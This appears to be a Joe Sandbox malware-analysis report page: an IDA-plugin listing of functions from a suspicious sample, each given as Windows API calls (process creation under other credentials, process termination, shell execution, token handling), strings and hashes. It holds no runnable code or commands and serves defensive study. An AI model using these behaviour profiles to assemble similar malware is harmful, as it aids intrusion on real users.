SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009E4CEA
_wcslen.LIBCMT ref: 009E4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009E4D10
_wcsstr.LIBVCRUNTIME ref: 009E4D1A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ffb07dfee9330a892aef72d8efecb75f99a5ae13bc637851a90b7f46455ee948
Instruction ID: 8bddacc791c9fc6602e0e2155d973fd820728c588c14281c5f787621052be760
Opcode Fuzzy Hash: ffb07dfee9330a892aef72d8efecb75f99a5ae13bc637851a90b7f46455ee948
Instruction Fuzzy Hash: A7210B32204240BBEB169B7ADC49F7B7B9DDF85760F108039F805CB192DA65DC41D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 009F581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2

_wcslen.LIBCMT ref: 009F587B
CoInitialize.OLE32(00000000), ref: 009F5995
CoCreateInstance.OLE32(00A1FCF8,00000000,00000001,00A1FB68,?), ref: 009F59AE
CoUninitialize.OLE32 ref: 009F59CC

Strings

.lnk, xrefs: 009F5876, 009F58C1, 009F5985

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: b380d2dfa66a78926018c132cf36daad4ca1c6f547dfb75fc73e580d684f8df7
Instruction ID: 315d41df2f9925f73e7793fba7b7149b9ebda278855efdabc61f8b8aca2f8672
Opcode Fuzzy Hash: b380d2dfa66a78926018c132cf36daad4ca1c6f547dfb75fc73e580d684f8df7
Instruction Fuzzy Hash: 07D173746087059FC714EF24C480A2ABBE5FF89724F15885DFA8A9B361DB31EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009E175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009E0FCA
Part of subcall function 009E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009E0FD6
Part of subcall function 009E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009E0FE5
Part of subcall function 009E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009E0FEC
Part of subcall function 009E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009E1002

GetLengthSid.ADVAPI32(?,00000000,009E1335), ref: 009E17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009E17BA
HeapAlloc.KERNEL32(00000000), ref: 009E17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 009E17DA
GetProcessHeap.KERNEL32(00000000,00000000,009E1335), ref: 009E17EE
HeapFree.KERNEL32(00000000), ref: 009E17F5

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 7f9aeb8540410c15b8a7c15b034fb5f5531b18f1f7b73f0d706450d93e8ce9ff
Instruction ID: 80d82af0dcaaadfce70bf18b9c1b5fae51903ff6a236d2d0fe2632689ae44bda
Opcode Fuzzy Hash: 7f9aeb8540410c15b8a7c15b034fb5f5531b18f1f7b73f0d706450d93e8ce9ff
Instruction Fuzzy Hash: E811A932680205FFDB11DFA5CC49BAE7BB9EB45765F108518F881A7210C736AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009E14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009E14FF
OpenProcessToken.ADVAPI32(00000000), ref: 009E1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009E1515
CloseHandle.KERNEL32(00000004), ref: 009E1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 009E1563

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: a6d93b50bce6b301ea5cdf4311d76a8f813e3b0f6e33a6f2b8a6d7f776d4f54e
Instruction ID: eb0869a5abb2df8e6db171849d2700f9edf70d7590963d7fd2baaea6826015d8
Opcode Fuzzy Hash: a6d93b50bce6b301ea5cdf4311d76a8f813e3b0f6e33a6f2b8a6d7f776d4f54e
Instruction Fuzzy Hash: 20115672600249ABDF12CFE8DD49BDE7BADEF48714F048024FA05A61A0D375CE61DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009A3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,009A3379,009A2FE5), ref: 009A3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009A339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009A33B7
SetLastError.KERNEL32(00000000,?,009A3379,009A2FE5), ref: 009A3409

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b5cee7e99c6ff4d56f25662e106d252d6a0f92785259344a8c2ff3bf4cd24f01
Instruction ID: 7b2da55b6b931b0eb283013fee50de442cb0a4d9b20026373c8e38ecaee1211b
Opcode Fuzzy Hash: b5cee7e99c6ff4d56f25662e106d252d6a0f92785259344a8c2ff3bf4cd24f01
Instruction Fuzzy Hash: 7801473B60E711BEEA6427F47C866672A98EBC7379320C229F424841F0FF124D0251C4

Uniqueness

Uniqueness Score: -1.00%

Function 009B2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,009B5686,009C3CD6,?,00000000,?,009B5B6A,?,?,?,?,?,009AE6D1,?,00A48A48), ref: 009B2D78
_free.LIBCMT ref: 009B2DAB
_free.LIBCMT ref: 009B2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,009AE6D1,?,00A48A48,00000010,00984F4A,?,?,00000000,009C3CD6), ref: 009B2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,009AE6D1,?,00A48A48,00000010,00984F4A,?,?,00000000,009C3CD6), ref: 009B2DEC
_abort.LIBCMT ref: 009B2DF2

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 47155d8eeaf0253ac3d98c8c72dcbaaf04e627363c212bb0df523a4dc31536dd
Instruction ID: 09a4c3b3ac414140596bae410b8dea89ffea559cb35377e5ef90ae152a5d5425
Opcode Fuzzy Hash: 47155d8eeaf0253ac3d98c8c72dcbaaf04e627363c212bb0df523a4dc31536dd
Instruction Fuzzy Hash: 48F0C83654561037C612B778BF0AFDA265DFFC67B1F258918F838961D6EE2488025160

Uniqueness

Uniqueness Score: -1.00%

Function 00A18A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00999639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996A2
Part of subcall function 00999639: BeginPath.GDI32(?), ref: 009996B9
Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A18A4E
LineTo.GDI32(?,00000003,00000000), ref: 00A18A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A18A70
LineTo.GDI32(?,00000000,00000003), ref: 00A18A80
EndPath.GDI32(?), ref: 00A18A90
StrokePath.GDI32(?), ref: 00A18AA0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 31bb3d34c06db57f0d131c134b2ab34f52f7473d31c5ac524131bf7dd630dd49
Instruction ID: d8bc53f8bf733eb55d79d58527e808d3ad25b64b97dbde0fa7c1f9f85dac8baa
Opcode Fuzzy Hash: 31bb3d34c06db57f0d131c134b2ab34f52f7473d31c5ac524131bf7dd630dd49
Instruction Fuzzy Hash: 5D11B776040109FFDB129F94EC88EEA7F6DEB083A4F04C052FA199A1A1C7719D56DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009E5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 009E5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E5230
ReleaseDC.USER32(00000000,00000000), ref: 009E5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 009E524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 009E5261

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e0d9158b1ec5c1e08b0cb468ac51d06f1223e39691a01670f501741139678051
Instruction ID: 21924f67b244b368b090e3d01486e4a279adc0a6f300794d23a5a90d0db233a9
Opcode Fuzzy Hash: e0d9158b1ec5c1e08b0cb468ac51d06f1223e39691a01670f501741139678051
Instruction Fuzzy Hash: F2014475A40754BBEB109BE69C49B9EBF78EB48761F048065FA05A7381D6709D01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00981BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00981BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00981BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00981C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00981C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00981C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00981C22

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b8949b950cd8dfd29f14e3a0f629a34ab935eab54f674daf03fae32ff73fa861
Instruction ID: 23cc2df4ebed77ac28f1ed4a923a76d006a807a9f7d32275869e0fefc23000d1
Opcode Fuzzy Hash: b8949b950cd8dfd29f14e3a0f629a34ab935eab54f674daf03fae32ff73fa861
Instruction Fuzzy Hash: F60167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 009EEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009EEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009EEB46
GetWindowThreadProcessId.USER32(?,?), ref: 009EEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009EEB75

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d01ef836aaea3b1bdaa5e67475f2430a9d80ea398e3fc6c9c4fb535fdf136dc4
Instruction ID: 6640f220f57d0be27e8f568e91236d92b5297deeb0cef6694a1c82884508e171
Opcode Fuzzy Hash: d01ef836aaea3b1bdaa5e67475f2430a9d80ea398e3fc6c9c4fb535fdf136dc4
Instruction Fuzzy Hash: 6AF03072580168BBE72197929C0DEEF7A7CEFCAB21F008158F611D1091D7A45A02C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 009D7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 009D7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 009D7469
GetWindowDC.USER32(?), ref: 009D7475
GetPixel.GDI32(00000000,?,?), ref: 009D7484
ReleaseDC.USER32(?,00000000), ref: 009D7496
GetSysColor.USER32(00000005), ref: 009D74B0

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 888de3397135960ee93373be4eaa17c6728c3a5c4f685f20a9924b1823b0b74d
Instruction ID: c1f60584c6e95b32ce7ce245c6dfee37cc4eaf61d3a49327cb0ce7440273048f
Opcode Fuzzy Hash: 888de3397135960ee93373be4eaa17c6728c3a5c4f685f20a9924b1823b0b74d
Instruction Fuzzy Hash: E2018631480215EFEB519FE4DC08BEABBB6FB04321F608164F926A21B0DB311E42EB10

Uniqueness

Uniqueness Score: -1.00%

Function 009E1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009E187F
UnloadUserProfile.USERENV(?,?), ref: 009E188B
CloseHandle.KERNEL32(?), ref: 009E1894
CloseHandle.KERNEL32(?), ref: 009E189C
GetProcessHeap.KERNEL32(00000000,?), ref: 009E18A5
HeapFree.KERNEL32(00000000), ref: 009E18AC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 1010cd47f26430decf6f349a55c75e4fd6822acca11fc3872f9c0849eae6a532
Instruction ID: 7d4ec8b9a63bff75ecf371b985e42ab7378006f728694f66834d1ba8b3ec4b28
Opcode Fuzzy Hash: 1010cd47f26430decf6f349a55c75e4fd6822acca11fc3872f9c0849eae6a532
Instruction Fuzzy Hash: A7E0C236484211BBDA019BE1ED0C98ABB2AFB49B32B10C220F225850B0CB729422DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009EC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009EC6EE
_wcslen.LIBCMT ref: 009EC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009EC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009EC7CA

Strings

0, xrefs: 009EC6AF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 0b1d13426dfb8a9efab465cbe2599219d27bc6cd0f1573b4c15913cb6962fbf7
Instruction ID: 50962fb087d67a4925969b633f5a19eda0cf4d512f61b05388bd9c740e829a7e
Opcode Fuzzy Hash: 0b1d13426dfb8a9efab465cbe2599219d27bc6cd0f1573b4c15913cb6962fbf7
Instruction Fuzzy Hash: A151D1B16043819BD712DF2AC885B6BB7E8AF8A710F040A2DF9D5D3290DB75DC46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A0AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00A0AEA3

Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625

GetProcessId.KERNEL32(00000000), ref: 00A0AF38
CloseHandle.KERNEL32(00000000), ref: 00A0AF67

Strings

<, xrefs: 00A0AE6B
@, xrefs: 00A0AE72

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 05163564d136dbf3d921c964affc3a9567c696c01304d0159c17d56d66df50d2
Instruction ID: e3c1a4245c796216ffdbe8175ce3918ec1761c546dc7c6dd3fabad1c9da7e8f4
Opcode Fuzzy Hash: 05163564d136dbf3d921c964affc3a9567c696c01304d0159c17d56d66df50d2
Instruction Fuzzy Hash: 8E717A71A00619DFCB14EF94D484A9EBBF0FF48314F148499E856AB792CB74ED41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009E719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009E7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009E723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009E724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009E72CF

Strings

DllGetClassObject, xrefs: 009E7242

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 431bae32f41b19910e114e504401bdc6d3e1f8bc98130d614c9a6993f5d3af6a
Instruction ID: ffe6bb2dceeb4f85c9367f64d46af19dd960f7850a4efd5e2018eff283ead365
Opcode Fuzzy Hash: 431bae32f41b19910e114e504401bdc6d3e1f8bc98130d614c9a6993f5d3af6a
Instruction Fuzzy Hash: A4419F71A04245EFDB16CF95C884B9ABBA9EF84310F1484A9BE059F30AD7B0DD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A13D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A13E35
IsMenu.USER32(?), ref: 00A13E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A13E92
DrawMenuBar.USER32 ref: 00A13EA5

Strings

0, xrefs: 00A13D89

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
